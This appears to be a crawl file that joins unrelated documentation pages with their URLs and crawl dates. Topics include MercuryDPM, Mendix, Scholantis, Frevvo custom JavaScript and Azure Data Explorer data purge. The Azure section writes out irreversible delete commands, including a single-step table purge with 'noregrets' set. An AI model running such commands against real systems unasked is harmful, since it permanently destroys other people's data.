Read the run number or the counter from the counter file (COUNTER_DONOTDEL) The procedure below reads the counter in from a file stored on the disk. Increments the number stored on the disk and then returns the current counter. Definition at line 89 of file FilesAndRunNumber.cc. Referenced by autoNumber(). This sets the counter/Run number, overriding the defaults. Definition at line 135 of file FilesAndRunNumber.cc. References runNumber_. Referenced by autoNumber(), and DPMBase::readNextArgument(). Accepts an output stream read function, which accepts an input stream std::ostream. Definition at line 242 of file FilesAndRunNumber.cc. References runNumber_, and Files::write(). Referenced by DPMBase::write(). This stores the run number for saving. Definition at line 131 of file FilesAndRunNumber.h. Referenced by constructor(), FilesAndRunNumber(), getRunNumber(), read(), setRunNumber(), and write().
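As a rough illustration of the idea behind get2DParametersFromRunNumber, and not the library's exact formula (the real implementation lives in FilesAndRunNumber.cc), one possible way to unfold a single counter into a study number and two one-based indices looks like this in Python:

```python
def counter_to_indices(counter, size_x, size_y):
    """Map a 1-based run counter onto (study_num, i, j).

    Illustrative sketch only: i runs over 1..size_x, j over 1..size_y,
    and study_num starts at 0, as described above. The exact ordering
    used by MercuryDPM may differ.
    """
    study_size = size_x * size_y
    study_num = (counter - 1) // study_size
    within = (counter - 1) % study_size
    i = within // size_y + 1
    j = within % size_y + 1
    return study_num, i, j

# With size_x = 2 and size_y = 5 (study_size = 10), counters 1..10 map to
# study 0 and counters 11..20 map to study 1.
for counter in (1, 5, 10, 11):
    print(counter, counter_to_indices(counter, size_x=2, size_y=5))
```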
http://docs.mercurydpm.org/Beta/d9/de3/classFilesAndRunNumber.html
2020-07-02T15:28:22
CC-MAIN-2020-29
1593655879532.0
[]
docs.mercurydpm.org
Pressing the sidebar toggle button will make a region of a scroll container appear or disappear. This makes it possible to create sidebars (for example, a menu on a mobile phone that is hidden by default and can be shown by clicking the button). See the image below for an example layout that uses the sidebar toggle. The sidebar toggle used to include settings to govern which layout region was toggled and how the transition was visualized. These configuration options were moved to the scroll container region to improve transparency in Mendix 6.10.
https://docs.mendix.com/refguide6/sidebar-toggle-button
2020-07-02T16:53:05
CC-MAIN-2020-29
1593655879532.0
[array(['attachments/16713866/16843980.png', None], dtype=object)]
docs.mendix.com
- 2016 update (4.16) will be deployed on Thursday, August 18th. During the update your sites will be unavailable for a few minutes at 5:00 pm local time. Don't forget about Assignments 3.0, Portfolio export and all the other great features available for the new school year. Notifications It's a game changer when you can instantly see what's happening anywhere on your portal. Here are a few examples of what you can expect to see in your notification feed: - Teachers can see when students turn in an assignment, create portfolios posts or comment on their student blogs. - Staff will see new memos, changes to events, notices about edited documents or replies to discussions. - Students find out when assignments have been graded, class announcements have been posted or teachers have commented on their work. Access the notification bell anywhere on your portal to see activity from the district, departments, schools, staff rooms, classes, groups, portfolios or blogs. View and filter notifications to see a specific site or notification type, and quickly mute sites with too much activity. Student Information - Maplewood, PowerSchool, MyEducation BC We are thrilled to announce the availability of Scholantis SIS Data Sync. This feature allows teachers to see their classes and work with students more easily than ever before. Once sync is enabled, you'll see your class list when creating or modifying your class site. Add all your students to your class site with a single click. SIS Data Sync is being released as a public beta; however, once it's enabled. Copy from the Cloud The new file picker lets you copy files from Google or Office 365 into document libraries or rich text areas. When viewing publications or shared documents you'll see a new Copy from Cloud option in the Insert tab. You'll also see it when editing rich text on pages, announcements or other list items. Other Enhancements SRB atrieveERP Authentication - Support for SRB Atrieve Scanning Module on portals using ADFS authentication. We have been working with the atrieveERP team to ensure the best possible experience for our shared customers. Portfolio Teacher Drafts - Teachers can now create posts that are hidden from students by locking the post and setting the post date into the future. Minor Fixes, Changes & Technical Notes - Portfolio export - Attachments in non-standard paths are now correctly exported. - Feedback tool - Feedback tool no longer blocks emails that are not verified in Scholantis support. - Bus Alert - Bus alerts displayed in a school now link to the school's schedule page instead of the district's. - Buy and Sell - Minor cosmetic improvements have been made to the Buy and Sell archive page.. User Group - Sign up now for the SharePoint for K-12 User Group to discuss new features, access the Scholantis Preview Site and get help from the community. Technical User Group Meeting - On November 16th we will be hosting an in-person user group for technical contacts in Vancouver. More details to follow. - Improved Document Editing - Office Online 2016 Server is now available and provides some great improvements for editing and co-authoring documents in SharePoint 2013. Get in touch with Scholantis to get the update. - Memos - Learn how to share important notices, directives and memos with your staff in a targeted and relevant way. Now integrated with notifications to let staff see when important items are posted! 
If you have comments on any new features or regarding the update process itself, please get in touch or use the feedback form in your site (look for the speech bubble).
https://docs.scholantis.com/display/RRN/4.16+Release+Notes
2020-07-02T14:51:11
CC-MAIN-2020-29
1593655879532.0
[]
docs.scholantis.com
A driver file usually contains a class derived from Mercury3D in which the concrete parameters of the application are defined, such as species, particles, walls, boundaries, time step, ..., and a main function where the class is declared and the time integration routine (solve) is called. Thus, the basic setup looks like this: This file defines a class named Example, that is derived from Mercury3D. It overrides the function setupInitialConditions (which is empty by default) with a function where the simulation objects (particles, walls, boundaries, species) are defined. Then the main function is defined (which is the function that is executed when you run the executable): First, the Example class is instantiated (a concrete instance of the class is created and stored in memory). Then, the global variables are set, such as name, gravity, spatial/temporal domain. Finally, the time integration routine (solve) is called. The following global variables should be set: The first command sets the name variable to Example, so the output files will be named Example.data, Example.restart, ... The next six commands set the dimensions of the system that are used in displaying the output. Finally, the final time and the time step are set. There are additional global parameters that can be set here, such as A species can be defined as follows: Other contact laws are possible; see the documentation of Species for more details. A particle can be defined as follows: See the documentation of BaseParticle for more details. A planar bottom wall at the bottom of the domain can be defined as follows: Other walls are possible; see the documentation of WallHandler for more details. A periodic boundary in x-direction can be defined as follows: Other boundaries are possible; see the documentation of BoundaryHandler for more details. In some cases it is not enough to define suitable initial conditions. This is done by overriding certain functions in the Mercury3D class, just as we are overriding setupInitialConditions. For example, to define a criterium to stop the simulation, one can override the In this case, the simulation is stopped as soon as the kinetic energy drops below 0.00001 times the elastic energy stored in the contact springs (a useful criteria to determine arresting flow). For more examples, see Overriding functions. While the above example works, we advise you to avoid the number of explicitly used parameters such as the tolerance \(1e-5\) inside the class definition. A good coding guideline is to define all parameters in one place (the main function), with the exception of the particles, walls and boundaries, so they can easily be found and changed later. You can start a new driver code by creating your own user directory. First, chose a UserName, then add a folder to the user directory and create a new source file, e.g. Example.cpp, which for convenience is copied here from the file Tutorial1.cpp. cd ~/MercurySource/Drivers/USER svn mkdir UserName cd UserName svn cp ../../Tutorials/Tutorial1.cpp Example.cpp Now write your code in the Example.cpp file. Note, you cannot yet execute your code, as the Makefiles in your build directory doesn't know about the new file. To update your Makefiles, use cmake. Note, the file name of your source file has to be unique, otherwise you get error messages. cd ~/MercuryBuild cmake . 
Now you can build and execute your new code: cd ~/MercuryBuild/Drivers/USER/UserName make Example Note, as we currently only support MercuryDPM on Linux/Mac OS, these instructions are only valid for such systems.
http://docs.mercurydpm.org/Trunk/d9/d71/DevelopersGuideDriver.html
2020-07-02T15:07:14
CC-MAIN-2020-29
1593655879532.0
[]
docs.mercurydpm.org
1. In your Menu area, tap the Grab a receipt icon. This will open up your phone's camera where you can take a photo of your receipt. 2. Tap Ok to use the photo or Retry to take another photo of your receipt. Please note: If you take a photo of multiple receipts, we cannot scan them. In addition, we will only scan receipts that have not yet been attached to an expense. You can skip the next steps, but we recommend adding these details as it will save you time once the expense is created: 3. Add a memo to your receipt, as this will populate the description box when you create the expense. 4. You can choose the Purchase Method of the expense. Tap Done to add that receipt to your account. The receipt will be sent to your account. Create an expense from your receipt by tapping Expense. If you have any receipts that have been sent to your email address, you will want to check out our email-to-receipts feature to get those receipts sent to your account. Please note: If your finance team uploads card statements on your behalf, do not create expenses from these receipts as you will create duplicates.
https://docs.expensein.com/en/articles/2039227-capture-a-receipt-mobile-app
2020-07-02T15:35:19
CC-MAIN-2020-29
1593655879532.0
[array(['https://downloads.intercomcdn.com/i/o/81898985/d81ed8c9f93d0a07daec00d0/Capture+receipts+1.png', None], dtype=object) array(['https://downloads.intercomcdn.com/i/o/109728602/2de3c5849cc3109af8743655/Receipt+memo.png', None], dtype=object) array(['https://downloads.intercomcdn.com/i/o/109728811/50a5d217999f14b23d93e95b/Unattached+receipt.png', None], dtype=object) array(['https://downloads.intercomcdn.com/i/o/81874981/b5bb4e018993fee9c6dceaf4/Capture+receipt+4.png', None], dtype=object) ]
docs.expensein.com
You can add custom behaviors by adding JavaScript to your form/flow. For example, you may want to change the look of your form's submit button when the user hovers the mouse over the button. It is possible to associate a custom JavaScript handler with any form control. See Custom JavaScript Examples for sample code.

Although JavaScript will accomplish the task, it is important to note that your scripts are not subjected to formal testing by the frevvo quality assurance team. Choosing an approach that is part of the Live Forms product, like Business Rules, is a better choice than adding JavaScript, since released versions undergo rigorous quality assurance testing. Customizations using JavaScript should only be used in special situations and if there is no other way to customize the form to the requirements.

For example, let's say you have a message control in your form that contains markup to pull in a custom JavaScript. The URL for the script contains the Live Forms home directory and revision number (s/script.js). An upgrade of Live Forms to a new release or revision version could potentially stop the form from working.

If you choose to add JavaScript, we strongly recommend that you are familiar with a JavaScript debugger / web development tool such as the Firebug extension for Firefox.

You have the choice of three different approaches:

1. Upload your custom JavaScript to Live Forms via the Scripts tab on the left menu inside your application. Follow these steps. Your custom JavaScript must contain the comment // frevvo custom JavaScript as the first line of the file or the upload will not be successful. Here is an example of code that will add dashes to a Social Security number control as the user is typing it in. See Custom JavaScript Examples for information on this sample code. Notice the JavaScript comment is the first line in the script file.
- Login to Live Forms as a designer user.
- Click the Edit icon for the application where you want to use the JavaScript.
- Click on the Script tab located on the left menu.
- Browse your hard drive for your script file, then click Upload. Your file will be uploaded and it will display with the name Custom Script even though your script file may have another name. Be aware that existing JavaScript files will be overwritten.
- If you need to modify the script, you must download it, make your modifications and then upload it again.

The example shows an Information form using an uploaded JavaScript to enter dashes in the Social Security Number field while the user is entering the data. If your JavaScript does not behave as expected after upgrading your version, you may need to revise it to solve the issue.

2. Follow these steps to add JavaScript to your form using the Message control. Here is an example of the script tag; put your JavaScript inside the script tag:

<script>
/* <![CDATA[ */
code goes here
/* ]]> */
</script>

3. Add JavaScript to the WEB-INF/rules/includes.js file located in <frevvo-home>\tomcat\webapps\frevvo.war. Includes.js is only for including JavaScript into rules that run server-side. The contents of this file are included in the Rule Execution when the context initializes. You can add any JS that you want, with the following caveats. Follow these steps to add JavaScript to the includes.js file:
- Rezip all the files in the c:\tmp\frevvo-war directory, even the ones you did not edit; if you change directories or zip them differently, Live Forms may not load correctly.

Here is an example of a snippet of code that, when added to includes.js, will allow you to do something like this in a rule: DateControl.value = MyUtil.today();

var MyUtil = {
    today: function() {
        var d = new Date();
        var dd = d.getDate();
        if (dd < 10) dd = '0' + dd;
        var mm = d.getMonth() + 1;
        if (mm < 10) mm = '0' + mm;
        var yyyy = d.getFullYear();
        return String(mm + "-" + dd + "-" + yyyy);
    }
}

If you wish to inject client-side script, you should not assume the availability of JavaScript libraries in your custom JavaScript handlers. Functions should be part of the standard JavaScript environment. A good reference for what is and is not in standard JavaScript can be found here: (Core JavaScript) and here: (browser DOM reference).

You can call any JavaScript code in a handler; you can access the DOM of the page (note that you only have access to the DOM of the iframe in which the form is rendered, assuming you're using a standard embedding) or call external code. In addition, you have access to the following methods. Here is an example of a custom event handler:

var CustomEventHandlers = {
    setup: function (el) {
        if (CustomView.hasClass(el, 's-submit'))
            FEvent.observe(el, 'click', this.submitClicked.bindAsObserver(this, el));
        else if (CustomView.hasClass(el, 'my-class'))
            FEvent.observe(el, 'change', this.myHandler.bindAsObserver(this, el));
    },
    submitClicked: function (evt, el) {
        alert('Submit button was clicked');
    },
    myHandler: function (evt, el) {
        alert('My Class change handler called');
    },
    onSaveSuccess: function (submissionId) {
        alert("Save complete. New submission id is: " + submissionId);
    },
    onSaveFailure: function () {
        alert("Save failed");
    }
}

Let's look at this in a little more detail. You can add different event handling to your JavaScript code. This example adds handlers for the click, mouseover and mouseout events of the Submit button:

/*
 * Custom Javascript here.
 */
var CustomEventHandlers = {
    setup: function (el) {
        if (CustomView.hasClass(el, 's-submit')) {
            alert('setting up s-submit events');
            FEvent.observe(el, 'click', this.submitClicked.bindAsObserver(this, el));
            FEvent.observe(el, 'mouseover', this.submitMouseOver.bindAsObserver(this, el));
            FEvent.observe(el, 'mouseout', this.submitMouseOut.bindAsObserver(this, el));
        }
    },
    submitClicked: function (evt, el) {
        alert('Submit button was clicked');
    },
    submitMouseOver: function (event, element) {
        alert('Submit mouse over');
    },
    submitMouseOut: function (event, element) {
        alert('Submit mouse out');
    }
}

In addition to the above, flows also support a few other methods:

var CustomFlowEventHandlers = {
    onNextClicked: function (name, id) {
        alert("Next button clicked for activity: " + name);
    },
    onNavClicked: function (name, id) {
        alert("Nav button clicked for activity: " + name);
    },
    onSaveSuccess: function (submissionId) {
        alert("Save complete. New submission id is: " + submissionId);
    },
    onSaveFailure: function () {
        alert("Save failed");
    }
}

As the method names indicate, these handlers are called for the corresponding flow events. It's not currently possible to directly fire a custom.js handler from a business rule. You can write a form.load rule that sets the value of a hidden control and set a change handler for that control in your custom.js Custom Handlers.
https://docs.frevvo.com/d/exportword?pageId=19795779
2020-07-02T15:33:33
CC-MAIN-2020-29
1593655879532.0
[]
docs.frevvo.com
Data purge. As a data platform, Azure Data Explorer supports the ability to delete individual records, through the use of Kusto .purge and related commands. You can also purge an entire table. Warning Data deletion through the .purge command is designed to be used to protect personal data and should not be used in other scenarios. It is not designed to support frequent delete requests, or deletion of massive quantities of data, and may have a significant performance impact on the service. Purge guidelines Carefully design your data schema and investigate relevant policies before storing personal data in Azure Data Explorer. - In a best-case scenario, the retention period on this data is sufficiently short and data is automatically deleted. - If retention period usage isn't possible, isolate all data that is subject to privacy rules in a small number of Azure Data Explorer tables. Optimally, use just one table and link to it from all other tables. This isolation allows you to run the data purge process on a small number of tables holding sensitive data, and avoid all other tables. - The caller should make every attempt to batch the execution of .purgecommands to 1-2 commands per table per day. Don't issue multiple commands with unique user identity predicates. Instead, send a single command whose predicate includes all user identities that require purging. Purge process The process of selectively purging data from Azure Data Explorer happens in the following steps: - Phase 1: Give an input with an Azure Data Explorer table name and a per-record predicate, indicating which records to delete. Kusto scans the table looking to identify data shards that would participate in the data purge. The shards identified are those having one or more records for which the predicate returns true. - Phase 2: (Soft Delete) Replace each data shard in the table (identified in step (1)) with a reingested version. The reingested version shouldn't have the records for which the predicate returns true. If new data is not being ingested into the table, then by the end of this phase, queries will no longer return data for which the predicate returns true. The duration of the purge soft delete phase depends on the following parameters: - The number of records that must be purged - Record distribution across the data shards in the cluster - The number of nodes in the cluster - The spare capacity it has for purge operations - Several other factors The duration of phase 2 can vary between a few seconds to many hours. - Phase 3: (Hard Delete) Work back all storage artifacts that may have the "poison" data, and delete them from storage. This phase is done at least five days after the completion of the previous phase, but no longer than 30 days after the initial command. These timelines are set to follow data privacy requirements. Issuing a .purge command triggers this process, which takes a few days to complete. If the density of records for which the predicate applies is sufficiently large, the process will effectively reingest all the data in the table. This reingestion has a significant impact on performance and COGS. Purge limitations and considerations The purge process is final and irreversible. It isn't possible to undo this process or recover data that has been purged. Commands such as undo table drop can't recover purged data. Rollback of the data to a previous version can't go to before the latest purge command. 
Before running the purge, verify the predicate by running a query and checking that the results match the expected outcome. You can also use the two-step process that returns the expected number of records that will be purged. The .purgecommand is executed against the Data Management endpoint:-[YourClusterName].[region].kusto.windows.net. The command requires database admin permissions on the relevant databases. Due to the purge process performance impact, and to guarantee that purge guidelines have been followed, the caller is expected to modify the data schema so that minimal tables include relevant data, and batch commands per table to reduce the significant COGS impact of the purge process. The predicateparameter of the .purge command is used to specify which records to purge. Predicatesize is limited to 63 KB. When constructing the predicate: - Use the 'in' operator, for example, where [ColumnName] in ('Id1', 'Id2', .. , 'Id1000'). - Note the limits of the 'in' operator (list can contain up to 1,000,000values). - If the query size is large, use externaldataoperator, for example where UserId in (externaldata(UserId:string) ["?..."]). The file stores the list of IDs to purge. - The total query size, after expanding all externaldatablobs (total size of all blobs), can't exceed 64 MB. Purge performance Only one purge request can be executed on the cluster, at any given time. All other requests are queued in Scheduled state. Monitor the purge request queue size, and keep within adequate limits to match the requirements applicable for your data. To reduce purge execution time: Follow the purge guidelines to decrease the amount of purged data. Adjust the caching policy since purge takes longer on cold data. Scale out the cluster Increase cluster purge capacity, after careful consideration, as detailed in Extents purge rebuild capacity. Changing this parameter requires opening a support ticket Trigger the purge process Note Purge execution is invoked by running purge table TableName records command on the Data Management endpoint-[YourClusterName].[Region].kusto.windows.net. Purge table TableName records command Purge command may be invoked in two ways for differing usage scenarios: Programmatic invocation: A single step that is intended to be invoked by applications. Calling this command directly triggers purge execution sequence. Syntax // Connect to the Data Management service #connect "-[YourClusterName].[region].kusto.windows.net" .purge table [TableName] records in database [DatabaseName] with (noregrets='true') <| [Predicate] Note Generate this command by using the CslCommandGenerator API, available as part of the Kusto Client Library NuGet package. Human invocation: A two-step process that requires an explicit confirmation as a separate step. First invocation of the command returns a verification token, which should be provided to run the actual purge. This sequence reduces the risk of inadvertently deleting incorrect data. Using this option may take a long time to complete on large tables with significant cold cache data. 
Syntax // Connect to the Data Management service #connect "-[YourClusterName].[region].kusto.windows.net" // Step #1 - retrieve a verification token (no records will be purged until step #2 is executed) .purge table [TableName] records in database [DatabaseName] <| [Predicate] // Step #2 - input the verification token to execute purge .purge table [TableName] records in database [DatabaseName] with (verificationtoken='<verification token from step #1>') <| [Predicate] Purge predicate limitations - The predicate must be a simple selection (for example, where [ColumnName] == 'X' / where [ColumnName] in ('X', 'Y', 'Z') and [OtherColumn] == 'A'). - Multiple filters must be combined with an 'and', rather than separate whereclauses (for example, where [ColumnName] == 'X' and OtherColumn] == 'Y'and not where [ColumnName] == 'X' | where [OtherColumn] == 'Y'). - The predicate can't reference tables other than the table being purged (TableName). The predicate can only include the selection statement ( where). It can't project specific columns from the table (output schema when running ' table| Predicate' must match table schema). - System functions (such as, ingestion_time(), extent_id()) aren't supported. Example: Two-step purge To start purge in a two-step activation scenario, run step #1 of the command: ```kusto // Connect to the Data Management service #connect "-[YourClusterName].[region].kusto.windows.net" .purge table MyTable records in database MyDatabase <| where CustomerId in ('X', 'Y') ``` **Output** | NumRecordsToPurge | EstimatedPurgeExecutionTime| VerificationToken |--|--|-- | 1,596 | 00:00:02 | e43c7184ed22f4f23c7a9d7b124d196be2e570096987e5baadf65057fa65736b Then, validate the NumRecordsToPurge before running step #2. To complete a purge in a two-step activation scenario, use the verification token returned from step #1 to run step #2: ```kusto .purge table MyTable records in database MyDatabase with (verificationtoken='e43c7184ed22f4f23c7a9d7b124d196be2e570096987e5baadf65057fa65736b') <| where CustomerId in ('X', 'Y') ``` **Output** | `OperationId` | `DatabaseName` | `TableName`|`ScheduledTime` | `Duration` | `LastUpdatedOn` |`EngineOperationId` | `State` | `StateDetails` |`EngineStartTime` | `EngineDuration` | `Retries` |`ClientRequestId` | `Principal`| |--|--|--|--|--|--|--|--|--|--|--|--|--|--| | c9651d74-3b80-4183-90bb-bbe9e42eadc4 |MyDatabase |MyTable |2019-01-20 11:41:05.4391686 |00:00:00.1406211 |2019-01-20 11:41:05.4391686 | |Scheduled | | | |0 |KE.RunCommand;1d0ad28b-f791-4f5a-a60f-0e32318367b7 |AAD app id=...| Example: Single-step purge To trigger a purge in a single-step activation scenario, run the following command: ```kusto // Connect to the Data Management service #connect "-[YourClusterName].[region].kusto.windows.net" .purge table MyTable records in database MyDatabase with (noregrets='true') <| where CustomerId in ('X', 'Y') ``` Output Cancel purge operation command If needed, you can cancel pending purge requests. Note This operation is intended for error recovery scenarios. It isn't guaranteed to succeed, and shouldn't be part of a normal operational flow. It can only be applied to in-queue requests (not yet dispatched to the engine node for execution). The command is executed on the Data Management endpoint. Syntax .cancel purge <OperationId> Example .cancel purge aa894210-1c60-4657-9d21-adb2887993e1 Output The output of this command is the same as the 'show purges OperationId' command output, showing the updated status of the purge operation being canceled. 
If the attempt is successful, the operation state is updated to Abandoned. Otherwise, the operation state isn't changed. Track purge operation status Note Purge operations can be tracked with the show purges command, executed against the Data Management endpoint-[YourClusterName].[region].kusto.windows.net. Status = 'Completed' indicates successful completion of the first phase of the purge operation, that is records are soft-deleted and are no longer available for querying. Customers aren't expected to track and verify the second phase (hard-delete) completion. This phase is monitored internally by Azure Data Explorer. Show purges command Show purges command shows purge operation status by specifying the operation ID within the requested time period. .show purges <OperationId> .show purges [in database <DatabaseName>] .show purges from '<StartDate>' [in database <DatabaseName>] .show purges from '<StartDate>' to '<EndDate>' [in database <DatabaseName>] Note Status will be provided only on databases that client has Database admin permissions. Examples .show purges .show purges c9651d74-3b80-4183-90bb-bbe9e42eadc4 .show purges from '2018-01-30 12:00' .show purges from '2018-01-30 12:00' to '2018-02-25 12:00' .show purges from '2018-01-30 12:00' to '2018-02-25 12:00' in database MyDatabase Output OperationId- the DM operation ID returned when executing purge. DatabaseName** - database name (case sensitive). TableName- table name (case sensitive). ScheduledTime- time of executing purge command to the DM service. Duration- total duration of the purge operation, including the execution DM queue wait time. EngineOperationId- the operation ID of the actual purge executing in the engine. State- purge state, can be one of the following values: Scheduled- purge operation is scheduled for execution. If job remains Scheduled, there's probably a backlog of purge operations. See purge performance to clear this backlog. If a purge operation fails on a transient error, it will be retried by the DM and set to Scheduled again (so you may see an operation transition from Scheduled to InProgress and back to Scheduled). InProgress- the purge operation is in-progress in the engine. Completed- purge completed successfully. BadInput- purge failed on bad input and won't be retried. This failure may be due to various issues such as a syntax error in the predicate, an illegal predicate for purge commands, a query that exceeds limits (for example, over 1M entities in an externaldataoperator or over 64 MB of total expanded query size), and 404 or 403 errors for externaldatablobs. Failed- purge failed and won't be retried. This failure may happen if the operation was waiting in the queue for too long (over 14 days), due to a backlog of other purge operations or a number of failures that exceed the retry limit. The latter will raise an internal monitoring alert and will be investigated by the Azure Data Explorer team. StateDetails- a description of the State. EngineStartTime- the time the command was issued to the engine. If there's a large difference between this time and ScheduledTime, there's usually a significant backlog of purge operations and the cluster is not keeping up with the pace. EngineDuration- time of actual purge execution in the engine. If purge was retried several times, it's the sum of all the execution durations. Retries- number of times the operation was retried by the DM service due to a transient error. ClientRequestId- client activity ID of the DM purge request. 
Principal- identity of the purge command issuer. Purging an entire table Purging a table includes dropping the table, and marking it as purged so that the hard delete process described in Purge process runs on it. Dropping a table without purging it doesn't delete all its storage artifacts. These artifacts are deleted according to the hard retention policy initially set on the table. The purge table allrecords command is quick and efficient and is preferable to the purge records process, if applicable for your scenario. Note The command is invoked by running the purge table TableName allrecords command on the Data Management endpoint-[YourClusterName].[region].kusto.windows.net. Purge table TableName allrecords command Similar to '.purge table records ' command, this command can be invoked in a programmatic (single-step) or in a manual (two-step) mode. Programmatic invocation (single-step): Syntax // Connect to the Data Management service #connect "-[YourClusterName].[Region].kusto.windows.net" .purge table [TableName] in database [DatabaseName] allrecords with (noregrets='true') Human invocation (two-steps): Syntax // Connect to the Data Management service #connect "-[YourClusterName].[Region].kusto.windows.net" // Step #1 - retrieve a verification token (the table will not be purged until step #2 is executed) .purge table [TableName] in database [DatabaseName] allrecords // Step #2 - input the verification token to execute purge .purge table [TableName] in database [DatabaseName] allrecords with (verificationtoken='<verification token from step #1>') Example: Two-step purge To start purge in a two-step activation scenario, run step #1 of the command: // Connect to the Data Management service #connect "-[YourClusterName].[Region].kusto.windows.net" .purge table MyTable in database MyDatabase allrecords Output To complete a purge in a two-step activation scenario, use the verification token returned from step #1 to run step #2: .purge table MyTable in database MyDatabase allrecords with (verificationtoken='eyJTZXJ2aWNlTmFtZSI6IkVuZ2luZS1pdHNhZ3VpIiwiRGF0YWJhc2VOYW1lIjoiQXp1cmVTdG9yYWdlTG9ncyIsIlRhYmxlTmFtZSI6IkF6dXJlU3RvcmFnZUxvZ3MiLCJQcmVkaWNhdGUiOiIgd2hlcmUgU2VydmVyTGF0ZW5jeSA9PSAyNSJ9') The output is the same as the '.show tables' command output (returned without the purged table). Output Example: Single-step purge To trigger a purge in a single-step activation scenario, run the following command: // Connect to the Data Management service #connect "-[YourClusterName].[Region].kusto.windows.net" .purge table MyTable in database MyDatabase allrecords with (noregrets='true') The output is the same as the '.show tables' command output (returned without the purged table). Output
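If you prefer to issue the command from code rather than from a client tool, the sketch below shows one way to build a batched predicate and run the two-step purge with the azure-kusto-data Python package. Treat it as a non-authoritative example: the cluster URI, database, table, and authentication method are placeholders, and you should verify the client API and the Data Management ("ingest-") endpoint details against the official SDK documentation.

```python
from azure.kusto.data import KustoClient, KustoConnectionStringBuilder

# Purge runs against the Data Management endpoint (note the "ingest-" prefix).
DM_URI = "https://ingest-mycluster.westeurope.kusto.windows.net"  # placeholder
DATABASE = "MyDatabase"                                           # placeholder

kcsb = KustoConnectionStringBuilder.with_az_cli_authentication(DM_URI)
client = KustoClient(kcsb)

# Batch all identities into a single 'in' predicate, per the purge guidelines.
user_ids = ["X", "Y", "Z"]
predicate = "where CustomerId in ({})".format(
    ", ".join("'{}'".format(u) for u in user_ids)
)

# Step 1: request a verification token (no records are purged yet).
step1 = ".purge table MyTable records in database {} <| {}".format(DATABASE, predicate)
token = client.execute_mgmt(DATABASE, step1).primary_results[0][0]["VerificationToken"]

# Step 2: execute the purge using the token returned by step 1.
step2 = (
    ".purge table MyTable records in database {} "
    "with (verificationtoken='{}') <| {}".format(DATABASE, token, predicate)
)
client.execute_mgmt(DATABASE, step2)
```

Checking NumRecordsToPurge from the step-1 result before running step 2 mirrors the manual two-step flow described above.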
https://docs.microsoft.com/en-us/azure/data-explorer/kusto/concepts/data-purge
2020-07-02T15:28:08
CC-MAIN-2020-29
1593655879532.0
[]
docs.microsoft.com
Released on: Tuesday, September 24, 2019 - 10:00 New in this release - Updated instrumentation to include Fragment and Activity classes derived from androidx support packages. - Updated 3rd party licenses information. Fixed in this release - Fixed crash that occurred when the agent tried to instrument Kotlin module_info.class files. - Updated JSON instrumentation to address crash that could occur when using R8 tools.
https://docs.newrelic.com/docs/release-notes/mobile-release-notes/android-release-notes/android-5240
2020-07-02T17:06:11
CC-MAIN-2020-29
1593655879532.0
[]
docs.newrelic.com
Button The Button Block can work as an event trigger, status switcher, or counter. Real-Life Examples - The power button is used to turn a laptop on or off - The Home button of an iPhone is used to lock or unlock the screen - The buttons of a mouse can record the number of times they are clicked Parameters - Size: 24×20mm - Life span: 100,000 times - Operating current: 15mA
http://docs.makeblock.com/diy-platform/en/mbuild/hardware/interaction/button.html
2020-07-02T17:03:39
CC-MAIN-2020-29
1593655879532.0
[array(['../../../../zh/mbuild/hardware/interaction/images/button.png', None], dtype=object) ]
docs.makeblock.com
This topic describes the structure of the source code distribution. The source code for the Alfresco Mobile SDK for iOS, which can be checked out of the GitHub repository, contains the AlfrescoSDK directory. The AlfrescoSDK directory contains the following files and sub-directories - AlfrescoSDK - containing the main source code - AlfrescoSDK.xcodeproj - the Xcode project to build the SDK - AlfrescoSDKTests - unit tests - CMIS - the CMIS library source code - scripts - scripts to build the library, documentation, and run unit tests. - build - built files, such as static libraries and API documentation go here. - LICENSE, NOTICE and README. These contain the Apache License details, the Alfresco copyright notice and information regarding the release.
https://docs.alfresco.com/mobile_sdk/ios/concepts/source-distribution.html
2020-11-24T02:53:22
CC-MAIN-2020-50
1606141171077.4
[]
docs.alfresco.com
It’s possible to hook up a centralized user data store with Alfresco Process Services. Any server supporting the LDAP protocol can be used. Special configuration options and logic has been included to work with Active Directory (AD) systems too. From a high-level overview, the external Identity Management (IDM) integration works as follows: Periodically, all user and group information is synchronized asynchronously. This means that all data for users (name, email address, group membership and so on) is copied to the Alfresco Process Services database. This is done to improve performance and to efficiently store more user data that doesn’t belong to the IDM system. If the user logs in to Alfresco Process Services, the authentication request is passed to the IDM system. On successful authentication there, the user data corresponding to that user is fetched from the Alfresco Process Services database and used for the various requests. Note that no passwords are saved in the database when using an external IDM. Note that the LDAP sync only needs to be activated and configured on one node in the cluster (but it works when activated on multiple nodes, but this will of course lead to higher traffic for both the LDAP system and the database).
https://docs.alfresco.com/process-services1.6/topics/externalIdentityManagement.html
2020-11-24T03:44:45
CC-MAIN-2020-50
1606141171077.4
[]
docs.alfresco.com
Raised Events Raised events are events in masters that you "raise" up out of the master to be accessible at the page level. This allows you to configure actions under the event that target widgets outside the master. It also allows you to configure different actions under the event for each instance of the master. Raising an EventRaising an Event Open a master on the canvas. Select a widget in the master whose event you want to raise. You can also click a blank spot on the canvas to work with the master's own page events. In the Interactions pane, click New Interaction and select the event you want to raise. At the bottom of the action list, select Raise Event. Click Add to create a new raised event, and give it a descriptive name. Alternatively, you can select from the list of raised events you've previously created in this master. Note You can manage all the raised events in the master you're currently editing by going to Arrange → Manage Raised Events. Click OK. You can now access the raised event from pages you've added instances of the master to. Using a Raised EventUsing a Raised Event Once you've created a raised event in a master, each instance of that master will have its own version of the raised event that you can configure at the page-level. Select an instance of a master and click New Interaction in the Interactions pane to access its raised events.
https://docs.axure.com/axure-rp/reference/raised-events/
2020-11-24T03:27:20
CC-MAIN-2020-50
1606141171077.4
[array(['/assets/screenshots/axure-rp/raised-events1.png', None], dtype=object) array(['/assets/screenshots/axure-rp/raised-events2.png', None], dtype=object) ]
docs.axure.com
Payment methods represent the type of payment sources (e.g., Credit Card, PayPal, or Apple Pay) offered in a market. They can have a price and must be present before placing an order. A payment method object is returned as part of the response body of each successful create, list, retrieve, or update API call.
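For orientation, a retrieved payment method comes back as a JSON:API document along the lines of the sketch below; the attribute names shown are illustrative and should be checked against the resource's attribute reference:

{
  "data": {
    "id": "xYZkjABcde",
    "type": "payment_methods",
    "attributes": {
      "name": "Credit Card",
      "payment_source_type": "credit_cards",
      "currency_code": "EUR",
      "price_amount_cents": 0
    }
  }
}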
https://docs.commercelayer.io/api/resources/payment_methods
2020-11-24T03:37:07
CC-MAIN-2020-50
1606141171077.4
[]
docs.commercelayer.io
Composer features:
Form Settings
